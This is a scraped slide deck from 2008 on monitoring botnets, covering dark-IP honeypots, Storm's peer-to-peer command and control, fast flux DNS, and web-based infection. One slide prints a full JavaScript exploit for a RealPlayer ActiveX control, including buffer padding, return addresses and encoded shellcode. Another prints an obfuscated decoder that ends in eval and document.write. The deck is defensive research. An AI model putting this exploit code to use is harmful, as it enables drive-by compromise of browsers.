Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008.

Slides:



Advertisements
Similar presentations
How to protect yourself, your computer, and others on the internet
Advertisements

Supplied on \web site. on January 10 th, 2008 Customer Security Management Reducing Internet fraud June 1 st, 2008 eSAC Walk Thru © Copyright Prevx Limited.
Next Generation Endpoint Security Jason Brown Enterprise Solution Architect McAfee May 23, 2013.
Cyber Threats: Industry Trends and Actionable Advice Presented by: Elton Fontaine.
SECURITY CHECK Protecting Your System and Yourself Source:
Security and Trust in E- Commerce. The E-commerce Security Environment: The Scope of the Problem  Overall size of cybercrime unclear; amount of losses.
Joshua Senzer, CISSP Sr. Systems Engineer – North East Channel
The development of Internet A cow was lost in Jan 14th If you know where it is, please contact with me. My QQ number is QQ is one of the.
Cyber X-Force-SMS alert system for threats.
 What is a botnet?  How are botnets created?  How are they controlled?  How are bots acquired?  What type of attacks are they responsible for? 
BotMiner Guofei Gu, Roberto Perdisci, Junjie Zhang, and Wenke Lee College of Computing, Georgia Institute of Technology.
BOTNETS/Cyber Criminals  How do we stop Cyber Criminals.
8.1 © 2007 by Prentice Hall 8 Chapter Securing Information Systems.
1 Understanding Botnet Phenomenon MITP Kevin Lynch, Will Fiedler, Navin Johri, Sam Annor, Alex Roussev.
Reliability and Security. Security How big a problem is security? Perfect security is unattainable Security in the context of a socio- technical system.
Botnets Abhishek Debchoudhury Jason Holmes. What is a botnet? A network of computers running software that runs autonomously. In a security context we.
Nate Olson-Daniel Director of Strategic Development & Principal Engineer The Inevitable Attack.
1 Panda Malware Radar Discovering hidden threats Technical Product Presentation Name Date.
Botnets Uses, Prevention, and Examples. Background Robot Network Programs communicating over a network to complete a task Adapted new meaning in the security.
Norman SecureSurf Protect your users when surfing the Internet.
Chapter Nine Maintaining a Computer Part III: Malware.
Sravanthi Vattikuti Sri Harsha Devabhaktuni
Malware Spyware & Viruses Overview  What does it look like?  What is it?  How can you prevent it?  What can you do about it when you get it?
Botnets An Introduction Into the World of Botnets Tyler Hudak
Chapter 2 Information Security Overview The Executive Guide to Information Security manual.
Introduction to Honeypot, Botnet, and Security Measurement
MSIT 458 – The Chinchillas. Offense Overview Botnet taxonomies need to be updated constantly in order to remain “complete” and are only as good as their.
資安新聞簡報 報告者:劉旭哲、曾家雄. Spam down, but malware up 報告者:劉旭哲.
Outline  Infections  1) r57 shell  2) rogue software  What Can We Do?  1) Seccheck  2) Virus total  3) Sandbox  Prevention  1) Personal Software.
Internet Security Aspects Dr. Gulshan Rai Director Indian Computer Emergency Response Team (CERT-In) Department of Information Technology.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Article presentation for: The Dark Cloud: Understanding and Defending against Botnets and Stealthy Malware Based on article by: Jaideep Chandrashekar,
CPS 82, Fall Crime l An act committed or omitted in violation of a low forbidding or commanding it and for which punishment is imposed upon conviction.
Malicious Code Brian E. Brzezicki. Malicious Code (from Chapter 13 and 11)
BotNet Detection Techniques By Shreyas Sali
Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
Palo Alto Networks Modern Malware Cory Grant Regional Sales Manager Palo Alto Networks.
1 All Your iFRAMEs Point to Us Mike Burry. 2 Drive-by downloads Malicious code (typically Javascript) Downloaded without user interaction (automatic),
COMP 2903 A27 – Why Spyware Poses Multiple Threats to Security Danny Silver JSOCS, Acadia University.
Honeypot and Intrusion Detection System
Bots Used to Facilitate Spam Matt Ziemniak. Discuss Snort lab improvements Spam as a vehicle behind cyber threats Bots and botnets What can be done.
Topics to be covered 1. What are bots,botnet ? 2.How does it work? 4.Prevention of botnet. 3.Types of botnets.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
1 Honeypot, Botnet, Security Measurement, Spam Cliff C. Zou CDA /01/07.
Host and Application Security Lesson 17: Botnets.
Botnets: Infrastructure and Attacks Slides courtesy of Nick Feamster as taught as Georgia Tech/CS6262.
What is risk online operation:  massive movement of operation to the internet has attracted hackers who try to interrupt such operation daily.  To unauthorized.
Nexthink V5 Demo Security – Malicious Anomaly. Situation › Avoid damage resulting from the incident itself and the cost of the unplanned response › Protection.
Module  Introduction Introduction  Techniques and tools used to commit computer crimes Techniques and tools used to commit computer crimes.
Lorenzo Martignoni, Elizabeth Stinson, Matt Fredrikson, Somesh Jha, John Mitchell RAID
Pacific Northwest Digital Government Summit Security – How Much is Enough? June 20, 2006 SA Kenneth A. Schmutz.
A Case Study on Computer Worms Balaji Badam. Computer worms A self-propagating program on a network Types of Worms  Target Discovery  Carrier  Activation.
Big Bad Botnet Day! Xeno Kovah In association with the Corporation for Public Botcasting, and Viewers Like You! Xeno Kovah In association with the Corporation.
Understand Malware LESSON Security Fundamentals.
BotMiner: Clustering Analysis of Network Traffic for Protocol- and Structure-Independent Botnet Detection Presented by D Callahan.
Speaker: Hom-Jay Hom Date:2009/10/20 Botnet Research Survey Zhaosheng Zhu. et al July 28-August
The hidden part of TDSS Sergey (k1k) Golovanov, Malware Expert Global Research and Analysis Team Kaspersky Lab.
Enterprise’ Ever-Evolving Challenge & Constraints Dealing with BYOD Challenges Enable Compliance to Regulations Stay Current with New Consumption Models.
1 Botnets Group 28: Sean Caulfield and Fredrick Young ECE 4112 Internetwork Security Prof. Henry Owen.
Koustav Sadhukhan, Rao Arvind Mallari and Tarun Yadav DRDO, Ministry of Defense, INDIA Cyber Attack Thread: A Control-flow Based Approach to Deconstruct.
Understanding Cyber Attacks: Technical Aspects of Cyber Kill Chain
A lustrum of malware network communication: Evolution & insights
VIRUS HOAX + BOTS. VIRUS HOAX + BOTS Group Members Aneeqa Ikram Fatima Ishaque Tufail Rana Anwar Amjad.
BotCatch: A Behavior and Signature Correlated Bot Detection Approach
Jon Peppler, Menlo Security Channels
Internet Worm propagation
Chapter 9 E-Commerce Security and Fraud Protection
Malware CJ
ONLINE SECURITY, ETHICS AND ETIQUETTES EMPOWERMENT TECHNOLOGY.
Introduction to Internet Worm
Presentation transcript:

Lit Space Monitoring for Botnets Stuart Staniford Chief Scientist 1/21/2008

2 Botnets = Targeted Infection + Remote Control Payload  Botnet - a collection of compromised PCs (bots) under remote command & control (C&C) to perpetrate a range of criminal activities  Remote control payload enables further malicious payload installs  Malicious payloads enable monetization via:  Spam relay (leased to spammers)  DDoS (extortion business model)  ID Theft (consumer, business, or gov’t)  Intellectual property theft  Phishing site hosting  Click fraud  Online financial services fraud  E-commerce site fraud

33 Botnets Are A Critical Threat Up to 75% of enterprises will be infiltrated by targeted malware that will evade their traditional defenses by end of 2007 Botnet worm infections can occur even [with] the very latest antivirus signatures and … OS and application patches. Up to a quarter of computers on the net may be used by cyber criminals in so- called botnets - Vint Cerf Botnets: A Global Pandemic

4 Growing Wave of Concern Nuisance Late 1990’s Concern Low Danger Beyond Botnet Attack Evolution High Magnitude of Threat Consumer Service Provider Enterprise Government Cyber warfare Mass-scale DDoS Mass-scale SPAM Click fraud Identity Theft Phishing Pharming Wide-scale revenue loss Corporate Espionage Total enterprise collapse Intellectual Property Theft Compliance Risks Productivity Loss Brand Damage Resource Inefficiency Cyber-terrorism DDoS SPAM Spyware platform Steal resources

Traditional Botnet (first half 2000s) Grow by active scanning Command & Control via IRC

6 Still a lot of that about Portion of a botnet tracked by FireEye botwall network

Monitoring Traditional Botnets Dark IP Space/Network Telescope Wait for bot to scan, and try to capture

Tradeoffs of Dark IP Monitoring  Advantages  Fidelity - if something scans dark IP, is likely bad  Cheap/easy - can cover a lot of IP space that wasn’t being used  Especially internally to enterprises  Disadvantages  Some bots avoid the dark-IP space - scan selectively  Persuading the bot to talk can be tricky  Need deep interaction honeypot to do it right  Bots moving away from scanning as a technique  Bot-owners can learn Dark Ips if feedback (eg to signatures)

Directions in Botnet Technology  Technology evolution is rapid  Well funded industry  Smart technologists  Disciplined execution of attacks and management of resources/business  Gives various trends that render current defensive technologies obsolete 1.Exploits via web/ (bypass firewall) 2.Obfuscation and polymorphism (bypass AV/IPS) 3.Distributed command-and-control, and high turnover of assets, 1.renders trackdown and clean-up hard 2.DNS tracking hard 3.Web crawling behind the curve

Exploits via web if(user.indexOf("nt 5.")==-1)return;VulObject="I"+"ER"+"PCtl.I"+"ERP"+"Ctl.1";try{Real=new ActiveXObject(VulObject)}catch(error){return}RealVersion=Real.PlayerProperty("PRODUCTVERSION");Padding="";JmpOver=unescape("%75% 06%74%04");for(i=0;i<32*148;i++)Padding+="S";if(RealVersion.indexOf(" ")==-1){if(navigator.userLanguage.toLowerCase()=="zh- cn")ret=unescape("%7f%a5%60");else if(navigator.userLanguage.toLowerCase()=="en-us")ret=unescape("%4f%71%a4%60");else return}else if(RealVersion==" ")ret=unescape("%63%11%08%60");else if(RealVersion==" ")ret=unescape("%63%11%04%60");else if(RealVersion==" ")ret=unescape("%79%31%01%60");else if(RealVersion==" ")ret=unescape("%79%31%09%60");else if(RealVersion==" ")ret=unescape("%51%11%70%63");else return;if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<4;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<6;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<9;i++)Padding=Padding+JmpOver;Padding=Padding+ret}else if(RealVersion.indexOf(" ")!=- 1){for(i=0;i<10;i++)Padding=Padding+JmpOver;Padding=Padding+ret}var cuteqqdbug;AdjESP="LLLL\\XXXXXLD";var cuteqqdbug2;cuteqqdbug2=cuteqqdbug;Shell="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIqpZKtPQKPKUczi3Vx9MCS2k04tvk KNKRKJXkGuJHXkIoYokOeGJo9lynkNoQz4JnmwmJPuKOQemnL2PuNn9rCc2ULVxvpu7yLTHyNGR6vOKOKNKNglgwONqnxFWMNkWtd7NX KjJ6z1LPYnKNJ6LKlLLRj3NJNt9oOWpuKHTVE9YoinKNPkTVruKOKNKNsCQPo9kOYnKNLiLV7qKNynkNgqMxzZ9m6YuiKNmrmPopxPGIMnX zmKLFokKNi9GqmxJV8M7ULmNMlirSnXyVNNnMGqoXyrntMBZ6npLJmJLROZntiomw2UJX26NNkOinKNQewfImONhBPuNVKRt5MVJrImuSN zT58khNynKNkNpuPlaF9nkNKNnvfoOCkktkZ6FonSYKTkNvUgNLMpNM5QkzQz41LxJv6YnXZroCsOXNhoMF1VXL9nynJ6cvXNYnynlVpFxWin InPuYjrJonoIkwkINj9leL5WrWMPJnMOJ6QVYqKOKNlVPFXk9oInofw6vnkNKNt5xzSZLyHGl9lJIlELtG47ophJz4KNZ6okObZmhLofNumKLLnpoZ odKOoWsEZXWf5gYnKNinbUuvkMoNKr1munyvPuOvofKMS5CMK1zNkNozLK2UNQYbymEesOkwz0njLZMBnkMMpuKaKMWeSMmSYninmZo WsEoKynRSmjm6KL8MP7hqQPXnyTWXOzzV7OP7L9ImdtmnVu6oyUx0xVNkKTOnN5n1ymNqhnnNLjJ4IjntxzNKuQOXKVNF5QlHznBQOKInO oDUKSkuNPn2LKm6MNhU8QkMlQXnnNOZJ49jNtKJnKvaLhhfLffamXZjPqoKkNMOsMUkzZweQO3MfYIzgecK0umP9zmzodkJNtnanIuQOX9vv YiilVzVKDKN8MWN46x9XzaegrOdxly7RuGl7snxUiOJJzXBkOKOPu32d3Ly8nOYNNNOloNOnOLonOlo2ST8O9KOKNKNLn5Qy8ZRwqMxZNQe lhyJOOMuNLymuOymeOKMWoKMGoSMgbjZmtnMT5Etwlc9nLfaeNNOOX0ulK8BpulJZpMVImdKI8PumXYNkMDKXMTwMgOOQCkM7KHMteJ QspjNO47XNjl6uoP5Yi9m14mnVutOyUYqLKvyY04590KjkMUsLX0uxrMe1eOPxbKM5s1e8zpuKMGKF5MpmwEm4VfTfcgqS1ZlozpoJRkwwlOsq mk7yWWhsVvWCrShZ5mMRWvOnQtNlvOuYSm0cjLZ4QsNQ8PQQtnSqoZnZOKNkNKNYnynKNynynKNKN9nYnkNynkNkNkNkNkNInlVnjLJLN ktkaN1kwkwyWHPMJmWmYNqLGnuYViVn0omNpJqLVMOlMMZJpmKOvMKKNA";PayLoad=Padding+AdjESP+Shell;while(PayLoad.length<0x 8000)PayLoad+="copyleft";Real["Import"]("c:\\Program Files\\NetMeeting\\TestSnd.wav",PayLoad,"",0,0)}RealExploit();

More obfuscated example function dc(sed){l=sed.length;var b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,11,56,48,57,43,35,36,27,31,0,0,0,0,0,0,53,20,29,7,55,44,8,9,5,49,46,32,16,40,45,18,28,0,42,4,33,39,61,23, 3,2,26,0,0,0,0,52,0,47,14,38,51,59,6,34,13,62,15,12,10,24,17,60,25,41,54,21,37,22,19,50,58,30,1);soot=sed;for(j=Math.ceil(l/b);j>0;j-- ){r='';for(i=Math.min(l,b);i>0;l--,i--){saam=t[soot.charCodeAt(p++)- 48];sttp=saam >8}else{rtk=83;s=6}}dd1="document";dd2="write(r)";eval(dd1+"."+dd2)}}dc("pryoMUyTB6Pw18VUEXicacpoEC9xKapclfjeIUb28iZcNXb Yljd1CEwO8BTPYqKkuFTmuFgAwmTWXP_L9VwHyM_PYq_CiZTkjPThwb2xjh3W8VgkaP3QDNxXDMKwdowz5E_uWFUBlF6HOFcHgFtku2 hdsCVcaiZclyJxTd0cacqgNCjxqa45Hu25") Variables and encoding can be polymorphic - not much for signatures to go on

Preliminary Expt on open network (Dec)  ~ 5000 users  ~ 3 hrs of intermittent data  Parsed HTTP and entities  ~ 200,000 HTTP containing flows  Google safe browsing API alerted on ~700 of them  Manually verified - only 11 checked out  Daily rate is ~100 incidents/day  Don’t know how many were successful at this point  Not sure how typical this period is so only order of magnitude estimate  Google safe browsing API is 99%+ false positives  Reasons not well understood yet  Gearing up for another experimental run  Hopefully LEET 08 paper

Distributed Command and Control - Storm Grow by spam/malicious downloads - been running for 12 months now in plain sight No scanning! 115,000 seen from a single.edu eDonkey UDP messages in Peer-to-Peer command and control

Dynamic Infrastructure - Fast Flux DNS Servers Small Number of Persistent Content Servers Large Number of Dynamic Proxies

FireEye, Inc. Confidential15 Rendering Current Approaches Obsolete GAP Need security solution that scales with exponential nature of threat Antivirus Bypass by not matching AV signatures IDS/IPS Bypass by not matching signatures & using other infection vectors Network Behavior Analysis Bypass by low & slow spread Dark IP Honeypots Bypass by not targeting dark IP addresses and honeypots

FireEye, Inc. Confidential16 Lit Space Monitoring

FireEye, Inc. Confidential17 Global Deployment Local Analysis & Protection Global Analysis & Intelligence Distribution

FireEye, Inc. Confidential Thank you! Q & A